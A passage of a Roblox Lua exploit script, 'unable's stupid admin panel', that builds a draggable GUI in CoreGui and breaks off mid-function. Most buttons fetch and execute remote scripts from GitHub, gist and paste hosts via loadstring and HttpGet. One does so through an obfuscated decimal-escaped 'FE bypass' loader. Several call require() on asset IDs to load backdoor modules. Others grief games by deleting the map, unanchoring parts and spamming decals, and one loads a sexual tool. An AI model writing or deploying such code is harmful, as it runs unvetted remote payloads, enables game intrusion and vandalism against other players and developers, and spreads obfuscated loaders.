--[[---------------------------------------------------------------------------------------------------------------------------
  __   __     ______     __  __     __     ______     __  __     ______    
 /\ "-.\ \   /\  __ \   /\_\_\_\   /\ \   /\  __ \   /\ \/\ \   /\  ___\   
 \ \ \-.  \  \ \ \/\ \  \/_/\_\/_  \ \ \  \ \ \/\ \  \ \ \_\ \  \ \___  \  
  \ \_\\"\_\  \ \_____\   /\_\/\_\  \ \_\  \ \_____\  \ \_____\  \/\_____\ 
   \/_/ \/_/   \/_____/   \/_/\/_/   \/_/   \/_____/   \/_____/   \/_____/
   
   Made by unable -- unable's stupid admin panel >.<
   
---------------------------------------------------------------------------------------------------------------------------]]--

wait(0.1) local unable = {}

---------------------------------------------------------------------------------------------------------------------------]]--

unable["version"] = "1"
unable["test game"] = 118022198489171
unable["workspace"] = game.Workspace
unable["user input service"] = game:GetService("UserInputService")
unable["players"] = game:GetService("Players")
unable["local player"] = unable["players"].LocalPlayer
unable["mouse"] = unable["local player"]:GetMouse()
unable["player gui"] = unable["local player"]:FindFirstChildWhichIsA("PlayerGui")
unable["user input service"] = game:GetService("UserInputService")
unable["tween service"] = game:GetService("TweenService")
unable["http service"] = game:GetService("HttpService")
unable["marketplace service"] = game:GetService("MarketplaceService")
unable["run service"] = game:GetService("RunService")
unable["teleport service"] = game:GetService("TeleportService")
unable["starter gui"] = game:GetService("StarterGui")
unable["gui service"] = game:GetService("GuiService")
unable["lighting"] = game:GetService("Lighting")
unable["context action service"] = game:GetService("ContextActionService")
unable["network client"] = game:GetService("NetworkClient")
unable["replicated storage"] = game:GetService("ReplicatedStorage")
unable["group service"] = game:GetService("GroupService")
unable["pathfinding service"] = game:GetService("PathfindingService")
unable["sound service"] = game:GetService("SoundService")
unable["teams"] = game:GetService("Teams")
unable["starter player"] = game:GetService("StarterPlayer")
unable["insert service"] = game:GetService("InsertService")
unable["chat"] = game:GetService("Chat")
unable["proximity prompt service"] = game:GetService("ProximityPromptService")
unable["stats"] = game:GetService("Stats")
unable["material service"] = game:GetService("MaterialService")
unable["avatar editor service"] = game:GetService("AvatarEditorService")
unable["text chat service"] = game:GetService("TextChatService")

-------------------------------------------------------------------------------------------------------------------------------

unable["screen gui"] = Instance.new("ScreenGui")
unable["screen gui"].Name = ":3"
unable["screen gui"].ResetOnSpawn = false

if game.PlaceId == unable["test game"] then
	unable["screen gui"].Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
else
	unable["screen gui"].Parent = game:GetService("CoreGui")
end

-------------------------------------------------------------------------------------------------------------------------------

unable["default background color"] = Color3.fromHex("252539")
unable["default border color"] = Color3.fromHex("4051ED")
unable["default 1/2 color"] = Color3.fromHex("293489")

-------------------------------------------------------------------------------------------------------------------------------

unable["click sound"] = Instance.new"Sound"
unable["click sound"].SoundId = "rbxassetid://226892749"
unable["click sound"].Parent = unable["local player"]
unable["click sound"].Volume = 0.2

unable["click sound 2"] = Instance.new"Sound"
unable["click sound 2"].SoundId = "rbxassetid://7148585764"
unable["click sound 2"].Parent = unable["local player"]
unable["click sound 2"].Volume = 0.2

function playclicksound()
	unable["click sound"]:Play()
	unable["click sound 2"]:Play()
end

-------------------------------------------------------------------------------------------------------------------------------

unable["toggle interface visibility button"] = Instance.new("TextButton")

unable["toggle interface visibility button"].Size = UDim2.new(0, 48, 0, 48)
unable["toggle interface visibility button"].Position = UDim2.new(0, 0, 10, 0)

unable["toggle interface visibility button"].BackgroundColor3 = unable["default background color"]

unable["toggle interface visibility button"].BorderColor3 = unable["default border color"]
unable["toggle interface visibility button"].BorderSizePixel = 0

unable["toggle interface visibility button"].TextColor3 = unable["default border color"]
unable["toggle interface visibility button"].Font = Enum.Font.RobotoMono
unable["toggle interface visibility button"].TextSize = 20
unable["toggle interface visibility button"].TextScaled = false
unable["toggle interface visibility button"].Text = ">.<"
unable["toggle interface visibility button"].TextXAlignment = Enum.TextXAlignment.Center
unable["toggle interface visibility button"].TextYAlignment = Enum.TextYAlignment.Center

unable["toggle interface visibility button text padding"] = Instance.new("UIPadding")
unable["toggle interface visibility button text padding"].PaddingTop = UDim.new(0, 20)
unable["toggle interface visibility button text padding"].Parent = unable["textbox"]

unable["toggle interface visibility button"].Parent = unable["screen gui"]
unable["toggle interface visibility button"].ZIndex = 50

unable["tivb ui rounded corner"] = Instance.new"UICorner"
unable["tivb ui rounded corner"].CornerRadius = UDim.new(0.3, 0)
unable["tivb ui rounded corner"].Parent = unable["toggle interface visibility button"]

function movebutton()
	local screenWidth = game:GetService("Workspace").CurrentCamera.ViewportSize.X

	local buttonWidth = 48

	local centerX = (screenWidth - buttonWidth) / 2
	local topMargin = 20
	local centerY = topMargin

	unable["toggle interface visibility button"].Position = UDim2.new(0, centerX, 0, centerY - 150)

	local offsetY = 150
	local targetPosition = UDim2.new(0, centerX, 0, centerY - offsetY)

	local tweenInfoUp = TweenInfo.new(0, Enum.EasingStyle.Back, Enum.EasingDirection.Out, 0, false, 0)

	local tweenUp = unable["tween service"]:Create(unable["toggle interface visibility button"], tweenInfoUp, {Position = targetPosition})

	local function moveButtonBack()
		local tweenInfoDown = TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out, 0, false, 0)

		local tweenDown = unable["tween service"]:Create(unable["toggle interface visibility button"], tweenInfoDown, {Position = UDim2.new(0, centerX, 0, centerY)})

		tweenDown:Play()
	end

	unable["toggle interface visibility button"].Visible = true
	tweenUp:Play()

	tweenUp.Completed:Wait()
	moveButtonBack()
end

unable["tivb border"] = Instance.new("Frame")
unable["tivb border"].Size = UDim2.new(0, 50, 0, 50)
unable["tivb border"].BackgroundColor3 = Color3.new(1,1,1)
unable["tivb border"].Position = UDim2.new(-2E-2, 0, -2E-2, 0)
unable["tivb border"].Parent = unable["toggle interface visibility button"]
unable["tivb border"].BorderSizePixel = 0
unable["tivb border"].ZIndex = 49

unable["tivb border rounded corner"] = Instance.new"UICorner"
unable["tivb border rounded corner"].CornerRadius = UDim.new(0.3, 0)
unable["tivb border rounded corner"].Parent = unable["tivb border"]

function dragbutton()
	local frame = unable["toggle interface visibility button"]
	local dragToggle 	
	local dragSpeed = 0.25
	local dragStart 	
	local startPos 

	local function updatebuttoninput(input)
		local delta = input.Position - dragStart
		local position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X,
			startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		unable["tween service"]:Create(frame, TweenInfo.new(dragSpeed), {Position = position}):Play()
	end

	frame.InputBegan:Connect(function(input)
		if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then 
			dragToggle = true
			dragStart = input.Position
			startPos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragToggle = false
				end
			end)
		end
	end)

	unable["user input service"].InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			if dragToggle then
				updatebuttoninput(input)
			end
		end
	end)
end

function addgradient()
	local gradient = Instance.new("UIGradient")
	gradient.Color =
		ColorSequence.new {
			ColorSequenceKeypoint.new(0, unable["default border color"]),
			ColorSequenceKeypoint.new(0.5, unable["default background color"]),
			ColorSequenceKeypoint.new(1, unable["default border color"])
		}
	gradient.Parent = unable["tivb border"]

	local rotationSpeed = 1
	task.spawn(
		function()
			while true do
				gradient.Rotation = (gradient.Rotation + rotationSpeed) % 360
				task.wait(0.03)
			end
		end
	)
end

dragbutton()
addgradient()
movebutton()

unable["toggle interface visibility button"].MouseButton1Click:Connect(
	function()
		unable["top bar"].Visible = not unable["top bar"].Visible
		playclicksound()
	end
)

--[[---------------------------------------------------------------------------------------------------------------------------

frame template

unable["frame"].Size = UDim2.new(1, 0, 1, 0)
unable["frame"].Position = UDim2.new(1, 0, 1, 0)

unable["frame"].BackgroundColor3 = unable["default background color"]

unable["frame"].BorderColor3 = unable["default border color"]
unable["frame"].BorderSizePixel = 1

unable["frame"].Parent = unable["screen gui"]
unable["frame"].ZIndex = 1

text box / label / button template

unable["textbox"].Size = UDim2.new(1, 0, 1, 0)
unable["textbox"].Position = UDim2.new(1, 0, 1, 0)

unable["textbox"].BackgroundColor3 = unable["default background color"]

unable["textbox"].BorderColor3 = unable["default border color"]
unable["textbox"].BorderSizePixel = 1

unable["textbox"].TextColor3 = unable["default border color"]
unable["textbox"].TextStrokeTransparency = 1
unable["textbox"].TextStrokeColor3 = unable["default background color"]
unable["textbox"].Font = Enum.Font.RobotoMono
unable["textbox"].TextSize = 20
unable["textbox"].TextScaled = false
unable["textbox"].Text = "text"
unable["textbox"].TextXAlignment = Enum.TextXAlignment.Center
unable["textbox"].TextYAlignment = Enum.TextYAlignment.Center
	
unable["textboxpadding"] = Instance.new("UIPadding")
unable["textboxpadding"].PaddingLeft = UDim.new(0, 1)
unable["textboxpadding"].PaddingRight = UDim.new(0, 1)
unable["textboxpadding"].Parent = unable["textbox"]

unable["textbox"].Parent = unable["screen gui"]
unable["textbox"].ZIndex = 1

---------------------------------------------------------------------------------------------------------------------------]]--

unable["top bar"] = Instance.new("TextLabel")

unable["top bar"].Size = UDim2.new(0, 401, 0, 26)

unable["top bar"].BackgroundColor3 = unable["default background color"]

unable["top bar"].BorderColor3 = unable["default border color"]
unable["top bar"].BorderSizePixel = 1

unable["top bar"].TextColor3 = unable["default border color"]
unable["top bar"].Font = Enum.Font.RobotoMono
unable["top bar"].TextSize = 15
unable["top bar"].TextScaled = false
unable["top bar"].Text = " [v" .. unable["version"] .. "] unable's stupid admin panel >.<"
unable["top bar"].TextXAlignment = Enum.TextXAlignment.Left
unable["top bar"].TextYAlignment = Enum.TextYAlignment.Center

unable["top bar text padding"] = Instance.new("UIPadding")
unable["top bar text padding"].PaddingLeft = UDim.new(0, 0)
unable["top bar text padding"].PaddingRight = UDim.new(0, 0)
unable["top bar text padding"].Parent = unable["top bar"]

unable["top bar"].Parent = unable["screen gui"]
unable["top bar"].ZIndex = 19
unable["top bar"].Visible = false

--[[

unable["top bar text padding"].PaddingRight = UDim.new(0, 110)

unable["top bar icon"] = Instance.new("ImageLabel")

unable["top bar icon"].Size = UDim2.new(0, 18, 0, 18)
unable["top bar icon"].Position = UDim2.new(0, 4, 0, 4.7)

unable["top bar icon"].BackgroundColor3 = unable["default background color"]
unable["top bar icon"].BackgroundTransparency = 0

unable["top bar icon"].BorderColor3 = unable["default border color"]
unable["top bar icon"].BorderSizePixel = 0

unable["top bar icon"].Image = "rbxassetid://11677094284"
unable["top bar icon"].ImageColor3 = unable["default border color"]

unable["top bar icon"].Parent = unable["top bar"]
unable["top bar icon"].ZIndex = 20

]]--

function centertopbar()
	local screenWidth = game:GetService"Workspace".CurrentCamera.ViewportSize.X
	local screenHeight = game:GetService"Workspace".CurrentCamera.ViewportSize.Y

	local frameWidth = 401
	local frameHeight = 276
	local centerX = (screenWidth - frameWidth) / 2
	local centerY = (screenHeight - frameHeight) / 2 - 61

	unable["top bar"].Position = UDim2.new(0, centerX, 0, centerY)
end

function dragtopbar()
	local frame = unable["top bar"]
	local dragToggle 	
	local dragSpeed = 0.25
	local dragStart 	
	local startPos 

	local function updatebuttoninput(input)
		local delta = input.Position - dragStart
		local position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X,
			startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		unable["tween service"]:Create(frame, TweenInfo.new(dragSpeed), {Position = position}):Play()
	end

	frame.InputBegan:Connect(function(input)
		if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then 
			dragToggle = true
			dragStart = input.Position
			startPos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragToggle = false
				end
			end)
		end
	end)

	unable["user input service"].InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			if dragToggle then
				updatebuttoninput(input)
			end
		end
	end)
end

centertopbar()
dragtopbar()

-------------------------------------------------------------------------------------------------------------------------------

unable["top bar close button"] = Instance.new("TextButton")

unable["top bar close button"].Size = UDim2.new(0, 18, 0, 18)
unable["top bar close button"].Position = UDim2.new(0, 378, 0, 4.7)

unable["top bar close button"].BackgroundColor3 = unable["default background color"]

unable["top bar close button"].BorderColor3 = unable["default border color"]
unable["top bar close button"].BorderSizePixel = 1

unable["top bar close button"].TextColor3 = unable["default border color"]
unable["top bar close button"].Font = Enum.Font.RobotoMono
unable["top bar close button"].TextSize = 20
unable["top bar close button"].TextScaled = false
unable["top bar close button"].Text = "x"
unable["top bar close button"].TextXAlignment = Enum.TextXAlignment.Center
unable["top bar close button"].TextYAlignment = Enum.TextYAlignment.Center

unable["top bar close button"].Parent = unable["top bar"]
unable["top bar close button"].ZIndex = 20

unable["top bar close button text padding"] = Instance.new("UIPadding")
unable["top bar close button text padding"].PaddingTop = UDim.new(0, -4)
unable["top bar close button text padding"].Parent = unable["top bar close button"]

unable["top bar close button"].MouseButton1Click:Connect(
	function()
		unable["top bar"].Visible = not unable["top bar"].Visible
		playclicksound()
	end
)

-------------------------------------------------------------------------------------------------------------------------------

unable["top bar minimize button"] = Instance.new("TextButton")

unable["top bar minimize button"].Size = UDim2.new(0, 18, 0, 18)
unable["top bar minimize button"].Position = UDim2.new(0, 354, 0, 4.7)

unable["top bar minimize button"].BackgroundColor3 = unable["default background color"]

unable["top bar minimize button"].BorderColor3 = unable["default border color"]
unable["top bar minimize button"].BorderSizePixel = 1

unable["top bar minimize button"].TextColor3 = unable["default border color"]
unable["top bar minimize button"].Font = Enum.Font.RobotoMono
unable["top bar minimize button"].TextSize = 20
unable["top bar minimize button"].TextScaled = false
unable["top bar minimize button"].Text = "-"
unable["top bar minimize button"].TextXAlignment = Enum.TextXAlignment.Center
unable["top bar minimize button"].TextYAlignment = Enum.TextYAlignment.Center

unable["top bar minimize button"].Parent = unable["top bar"]
unable["top bar minimize button"].ZIndex = 20

unable["top bar minimize button text padding"] = Instance.new("UIPadding")
unable["top bar minimize button text padding"].PaddingTop = UDim.new(0, 0)
unable["top bar minimize button text padding"].Parent = unable["top bar minimize button"]

unable["top bar minimize button"].MouseButton1Click:Connect(
	function()
		unable["main frame"].Visible = not unable["main frame"].Visible
		playclicksound()
	end
)

-------------------------------------------------------------------------------------------------------------------------------

unable["main frame"] = Instance.new("Frame")

unable["main frame"].Size = UDim2.new(0, 401, 0, 250)
unable["main frame"].Position = UDim2.new(0, 0, 1, 0)

unable["main frame"].BackgroundColor3 = unable["default background color"]

unable["main frame"].BorderColor3 = unable["default border color"]
unable["main frame"].BorderSizePixel = 1

unable["main frame"].Parent = unable["top bar"]
unable["main frame"].ZIndex = 18

-------------------------------------------------------------------------------------------------------------------------------

unable["scripts tab"] = Instance.new("TextButton")

unable["scripts tab"].Size = UDim2.new(0, 100, 0, 26)
unable["scripts tab"].Position = UDim2.new(0, 0, 0, 1)

unable["scripts tab"].BackgroundColor3 = unable["default background color"]

unable["scripts tab"].BorderColor3 = unable["default border color"]
unable["scripts tab"].BorderSizePixel = 1

unable["scripts tab"].TextColor3 = unable["default border color"]
unable["scripts tab"].Font = Enum.Font.RobotoMono
unable["scripts tab"].TextSize = 15
unable["scripts tab"].TextScaled = false
unable["scripts tab"].Text = "scripts"
unable["scripts tab"].TextXAlignment = Enum.TextXAlignment.Center
unable["scripts tab"].TextYAlignment = Enum.TextYAlignment.Center

unable["scripts tab text padding"] = Instance.new("UIPadding")
unable["scripts tab text padding"].PaddingLeft = UDim.new(0, 0)
unable["scripts tab text padding"].Parent = unable["scripts tab"]

unable["scripts tab"].Parent = unable["main frame"]
unable["scripts tab"].ZIndex = 19

-------------------------------------------------------------------------------------------------------------------------------

-- Create the button holder frames
unable["button holder"] = Instance.new("Frame")
unable["button holder"].Size = UDim2.new(0, 369, 0, 214)
unable["button holder"].Position = UDim2.new(0, 28, 0, 32)
unable["button holder"].BackgroundColor3 = unable["default background color"]
unable["button holder"].BorderColor3 = unable["default border color"]
unable["button holder"].BorderSizePixel = 0
unable["button holder"].Parent = unable["main frame"]
unable["button holder"].ZIndex = 19
unable["button holder"].Visible = true

unable["button holder 2"] = Instance.new("Frame")
unable["button holder 2"].Size = UDim2.new(0, 369, 0, 214)
unable["button holder 2"].Position = UDim2.new(0, 28, 0, 32)
unable["button holder 2"].BackgroundColor3 = unable["default background color"]
unable["button holder 2"].BorderColor3 = unable["default border color"]
unable["button holder 2"].BorderSizePixel = 0
unable["button holder 2"].Parent = unable["main frame"]
unable["button holder 2"].ZIndex = 19
unable["button holder 2"].Visible = false

unable["button holder 3"] = Instance.new("Frame")
unable["button holder 3"].Size = UDim2.new(0, 369, 0, 214)
unable["button holder 3"].Position = UDim2.new(0, 28, 0, 32)
unable["button holder 3"].BackgroundColor3 = unable["default background color"]
unable["button holder 3"].BorderColor3 = unable["default border color"]
unable["button holder 3"].BorderSizePixel = 0
unable["button holder 3"].Parent = unable["main frame"]
unable["button holder 3"].ZIndex = 19
unable["button holder 3"].Visible = false

-- Create the 'Next Page' button
unable["next page"] = Instance.new("TextButton")
unable["next page"].Size = UDim2.new(0, 19, 0, 214)
unable["next page"].Position = UDim2.new(0, 378, 0, 32)
unable["next page"].BackgroundColor3 = unable["default background color"]
unable["next page"].BorderColor3 = unable["default border color"]
unable["next page"].BorderSizePixel = 1
unable["next page"].Parent = unable["main frame"]
unable["next page"].ZIndex = 19
unable["next page"].Visible = true

unable["next page"].TextColor3 = unable["default border color"]
unable["next page"].Font = Enum.Font.RobotoMono
unable["next page"].TextSize = 15
unable["next page"].TextScaled = false
unable["next page"].Text = ">"
unable["next page"].TextXAlignment = Enum.TextXAlignment.Center
unable["next page"].TextYAlignment = Enum.TextYAlignment.Center

unable["next page text padding"] = Instance.new("UIPadding")
unable["next page text padding"].PaddingBottom = UDim.new(0, 1)
unable["next page text padding"].Parent = unable["next page"]

-- Create the 'Previous Page' button
unable["previous page"] = Instance.new("TextButton")
unable["previous page"].Size = UDim2.new(0, 19, 0, 214)
unable["previous page"].Position = UDim2.new(0, 4, 0, 32)
unable["previous page"].BackgroundColor3 = unable["default background color"]
unable["previous page"].BorderColor3 = unable["default border color"]
unable["previous page"].BorderSizePixel = 1
unable["previous page"].Parent = unable["main frame"]
unable["previous page"].ZIndex = 19
unable["previous page"].Visible = true

unable["previous page"].TextColor3 = unable["default border color"]
unable["previous page"].Font = Enum.Font.RobotoMono
unable["previous page"].TextSize = 15
unable["previous page"].TextScaled = false
unable["previous page"].Text = "<"
unable["previous page"].TextXAlignment = Enum.TextXAlignment.Center
unable["previous page"].TextYAlignment = Enum.TextYAlignment.Center

unable["previous page text padding"] = Instance.new("UIPadding")
unable["previous page text padding"].PaddingBottom = UDim.new(0, 1)
unable["previous page text padding"].Parent = unable["previous page"]

-- Table of pages
local pages = {
	unable["button holder"],
	unable["button holder 2"],
	unable["button holder 3"]
}

local currentPageIndex = 1 -- Start on the first page
local savedPageIndex = 1 -- Variable to save the last page visited

-- Function to update page visibility
local function updatePages()
	for index, page in ipairs(pages) do
		page.Visible = (index == currentPageIndex)
	end
end

-- Update the 'Next Page' button functionality
unable["next page"].MouseButton1Click:Connect(function()
	playclicksound()
	currentPageIndex = currentPageIndex % #pages + 1 -- Cycle to the next page
	savedPageIndex = currentPageIndex -- Save the new page index
	updatePages()
end)

-- Update the 'Previous Page' button functionality
unable["previous page"].MouseButton1Click:Connect(function()
	playclicksound()
	currentPageIndex = (currentPageIndex - 2) % #pages + 1 -- Cycle to the previous page
	savedPageIndex = currentPageIndex -- Save the new page index
	updatePages()
end)

-- Adjust the "scripts tab" button functionality
unable["scripts tab"].MouseButton1Click:Connect(function()
	playclicksound()

	-- Hide other elements
	unable["executor scrolling frame"].Visible = false
	unable["execute button"].Visible = false
	unable["list of commands"].Visible = false
	unable["command bar"].Visible = false
	unable["execute command button"].Visible = false
	unable["asset id type indicator"].Visible = false
	unable["next page 2 button"].Visible = false
	unable["previous page 2 button"].Visible = false
	unable["switch asset id type button"].Visible = false
	unable["switch asset id type button 2"].Visible = false

	-- Show navigation buttons and restore saved page
	unable["next page"].Visible = true
	unable["previous page"].Visible = true
	currentPageIndex = savedPageIndex -- Restore the saved page
	updatePages()
end)

-- Table to store buttons
local buttonList = {}

-- Function to create a new button
function newscriptbutton(buttonText, onClick)
	-- Ensure there are no more than 9 buttons
	if #buttonList >= 9 then
		warn("Maximum of 9 buttons reached.")
		return
	end

	-- Calculate button position based on index
	local index = #buttonList + 1
	local row = math.floor((index - 1) / 3) -- Row index (0, 1, 2)
	local column = (index - 1) % 3 -- Column index (0, 1, 2)
	local xOffset = column * 117 -- Horizontal spacing
	local yOffset = row * 73 -- Vertical spacing (68 height + 6 spacing)

	-- Create the button
	local button = Instance.new("TextButton")
	button.Size = UDim2.new(0, 111, 0, 68)
	button.Position = UDim2.new(0, xOffset, 0, yOffset)
	button.BackgroundColor3 = unable["default background color"]
	button.BorderColor3 = unable["default border color"]
	button.BorderSizePixel = 1
	button.TextColor3 = unable["default border color"]
	button.Font = Enum.Font.RobotoMono
	button.TextSize = 15
	button.TextScaled = false
	button.Text = buttonText
	button.TextXAlignment = Enum.TextXAlignment.Center
	button.TextYAlignment = Enum.TextYAlignment.Center
	button.Parent = unable["button holder"]
	button.ZIndex = 19
	button.Visible = true

	-- Connect the onClick function and play sounds
	button.MouseButton1Click:Connect(function()
		playclicksound()
		onClick()
	end)

	-- Add the button to the list
	table.insert(buttonList, button)
end

-- Example usage:
newscriptbutton("immortality\nlord", function()
	require(6534274227)(unable["local player"].Name)
end)

newscriptbutton("john doe", function()
	require(2845929020).ooga(unable["local player"].Name)
end)

newscriptbutton("DEX explorer", function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Babyhamsta/RBLX_Scripts/main/Universal/BypassedDarkDexV3.lua", true))()
end)

newscriptbutton("goner", function()
	require(4513235536).G(unable["local player"].Name) 
end)

newscriptbutton("grab knife", function()
	loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Grab-knife-v4-24753"))()
end)

newscriptbutton("star glitcher", function()
	require(5738781015).load(unable["local player"].Name)
end)

newscriptbutton("clear map", function()
	local workspace = game:GetService("Workspace")

	-- Function to create a Baseplate if one doesn't exist
	local function ensureBaseplate()
		local baseplate = workspace:FindFirstChild("Baseplate")

		if not baseplate then
			print("No Baseplate found. Creating one...")
			baseplate = Instance.new("Part")
			baseplate.Name = "Baseplate"
			baseplate.Size = Vector3.new(512, 1, 512)
			baseplate.Anchored = true
			baseplate.Position = Vector3.new(0, 0, 0)
			baseplate.BrickColor = BrickColor.new("Medium stone grey")
			baseplate.Material = Enum.Material.SmoothPlastic
			baseplate.Parent = workspace
		end

		return baseplate
	end

	local baseplate = ensureBaseplate() -- Ensure a baseplate exists
	local camera = workspace:FindFirstChild("Camera")

	for _, item in pairs(workspace:GetChildren()) do
		-- Don't delete the Baseplate or Camera
		if item ~= baseplate and item ~= camera then
			item:Destroy()
		end
	end
end)

newscriptbutton("infinite yield", function()
	loadstring(game:HttpGet"https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source")()
end)

newscriptbutton("mobile keyboard", function()
	loadstring(game:HttpGet"https://gist.githubusercontent.com/RedZenXYZ/4d80bfd70ee27000660e4bfa7509c667/raw/da903c570249ab3c0c1a74f3467260972c3d87e6/KeyBoard%2520From%2520Ohio%2520Fr%2520Fr")()
end)

-- Table to store buttons
local buttonList2 = {}

-- Function to create a new button
function newscriptbutton2(buttonText, onClick)
	-- Ensure there are no more than 9 buttons
	if #buttonList2 >= 9 then
		warn("Maximum of 9 buttons reached.")
		return
	end

	-- Calculate button position based on index
	local index = #buttonList2 + 1
	local row = math.floor((index - 1) / 3) -- Row index (0, 1, 2)
	local column = (index - 1) % 3 -- Column index (0, 1, 2)
	local xOffset = column * 117 -- Horizontal spacing
	local yOffset = row * 73 -- Vertical spacing (68 height + 6 spacing)

	-- Create the button
	local button = Instance.new("TextButton")
	button.Size = UDim2.new(0, 111, 0, 68)
	button.Position = UDim2.new(0, xOffset, 0, yOffset)
	button.BackgroundColor3 = unable["default background color"]
	button.BorderColor3 = unable["default border color"]
	button.BorderSizePixel = 1
	button.TextColor3 = unable["default border color"]
	button.Font = Enum.Font.RobotoMono
	button.TextSize = 15
	button.TextScaled = false
	button.Text = buttonText
	button.TextXAlignment = Enum.TextXAlignment.Center
	button.TextYAlignment = Enum.TextYAlignment.Center
	button.Parent = unable["button holder 2"]
	button.ZIndex = 19
	button.Visible = true

	-- Connect the onClick function and play sounds
	button.MouseButton1Click:Connect(function()
		playclicksound()
		onClick()
	end)

	-- Add the button to the list
	table.insert(buttonList2, button)
end

-- Example usage:
newscriptbutton2("fe bypass gui", function()
	loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\103\48\48\108\88\112\108\111\105\116\101\114\47\103\48\48\108\88\112\108\111\105\116\101\114\47\109\97\105\110\47\70\101\37\50\48\98\121\112\97\115\115\34\44\32\116\114\117\101\41\41\40\41\10")()
end)

newscriptbutton2("c00lgui", function()
	require(6032524768).Eagle(unable["local player"].Name)
end)

newscriptbutton2("666", function()
	print("Script 3 executed!")
end)

newscriptbutton2("holy wrench", function()
	require(8596757978).load(unable["local player"].Name)
end)

-- Settings
local interval = 0.2 -- Time in seconds between color changes
local brightnessRange = {1, 3} -- Brightness range
local colorChangeSpeed = 5 -- Speed of color changes

-- Function to generate a random color
local function getRandomColor()
	return Color3.new(math.random(), math.random(), math.random())
end

-- Variable to control the disco mode
local isDiscoActive = false

-- Function to start disco mode
local function startDiscoMode()
	while isDiscoActive do
		-- Randomize lighting properties
		unable["lighting"].Ambient = getRandomColor()
		unable["lighting"].OutdoorAmbient = getRandomColor()
		unable["lighting"].ColorShift_Top = getRandomColor()
		unable["lighting"].Brightness = math.random(brightnessRange[1] * 100, brightnessRange[2] * 100) / 100

		-- Wait for the next change
		task.wait(interval)
	end
end

local originalSettings = {}
	
function savelighting()
	originalSettings.Brightness = unable["lighting"].Brightness
	originalSettings.ClockTime = unable["lighting"].ClockTime
	originalSettings.FogEnd = unable["lighting"].FogEnd
	originalSettings.GlobalShadows = unable["lighting"].GlobalShadows
	originalSettings.OutdoorAmbient = unable["lighting"].OutdoorAmbient
	originalSettings.Ambient = unable["lighting"].Ambient
	originalSettings.ColorShift_Top = unable["lighting"].ColorShift_Top
end

function loadlghting()	
	unable["lighting"].Brightness = originalSettings.Brightness
	unable["lighting"].ClockTime = originalSettings.ClockTime
	unable["lighting"].FogEnd = originalSettings.FogEnd
	unable["lighting"].GlobalShadows = originalSettings.GlobalShadows
	unable["lighting"].OutdoorAmbient = originalSettings.OutdoorAmbient
	unable["lighting"].Ambient = originalSettings.Ambient
	unable["lighting"].ColorShift_Top = originalSettings.ColorShift_Top
end

newscriptbutton2("disco", function()
	if not isDiscoActive then
		savelighting()
		isDiscoActive = true
		task.spawn(startDiscoMode) -- Start the disco mode in a separate thread
	end
end)

newscriptbutton2("k00pgui", function()
	require(14412108127).gui(unable["local player"].Name)
end)

newscriptbutton2("wallwalk", function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/infyiff/backup/main/wallwalker.lua"))()
end)

newscriptbutton2("remote spy", function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/realredz/SimpleSpy/refs/heads/main/Mobile.lua"))()
end)

newscriptbutton2("unanchor map", function()
	for _, descendant in pairs(workspace:GetDescendants()) do
		if descendant:IsA("BasePart") then
			descendant.Anchored = false
		end
	end
end)

-- Table to store buttons
local buttonList3 = {}

-- Function to create a new button
function newscriptbutton3(buttonText, onClick)
	-- Ensure there are no more than 9 buttons
	if #buttonList3 >= 9 then
		warn("Maximum of 9 buttons reached.")
		return
	end

	-- Calculate button position based on index
	local index = #buttonList3 + 1
	local row = math.floor((index - 1) / 3) -- Row index (0, 1, 2)
	local column = (index - 1) % 3 -- Column index (0, 1, 2)
	local xOffset = column * 117 -- Horizontal spacing
	local yOffset = row * 73 -- Vertical spacing (68 height + 6 spacing)

	-- Create the button
	local button = Instance.new("TextButton")
	button.Size = UDim2.new(0, 111, 0, 68)
	button.Position = UDim2.new(0, xOffset, 0, yOffset)
	button.BackgroundColor3 = unable["default background color"]
	button.BorderColor3 = unable["default border color"]
	button.BorderSizePixel = 1
	button.TextColor3 = unable["default border color"]
	button.Font = Enum.Font.RobotoMono
	button.TextSize = 15
	button.TextScaled = false
	button.Text = buttonText
	button.TextXAlignment = Enum.TextXAlignment.Center
	button.TextYAlignment = Enum.TextYAlignment.Center
	button.Parent = unable["button holder 3"]
	button.ZIndex = 19
	button.Visible = true

	-- Connect the onClick function and play sounds
	button.MouseButton1Click:Connect(function()
		playclicksound()
		onClick()
	end)

	-- Add the button to the list
	table.insert(buttonList3, button)
end

-- Example usage:
newscriptbutton3("jerk off tool", function()
	loadstring(game:HttpGet("https://pastefy.app/wa3v2Vgm/raw"))("Spider Script")
end)

newscriptbutton3("c00lunable\ndecal spam", function()
	local function test2(root)
		for _, v in pairs(root:GetChildren()) do
			if v:IsA"Decal"and v.Texture ~= "rbxassetid://117458353677051" then
				v.Parent = nil
			elseif v:IsA"BasePart"then
				v.Material = "Plastic"
				local One = Instance.new("Decal", v)
				local Two = Instance.new("Decal", v)
				local Three = Instance.new("Decal", v)
				local Four = Instance.new("Decal", v)
				local Five = Instance.new("Decal", v)
				local Six = Instance.new("Decal", v)
				One.Texture = "rbxassetid://117458353677051"
				Two.Texture = "rbxassetid://117458353677051"
				Three.Texture = "rbxassetid://117458353677051"
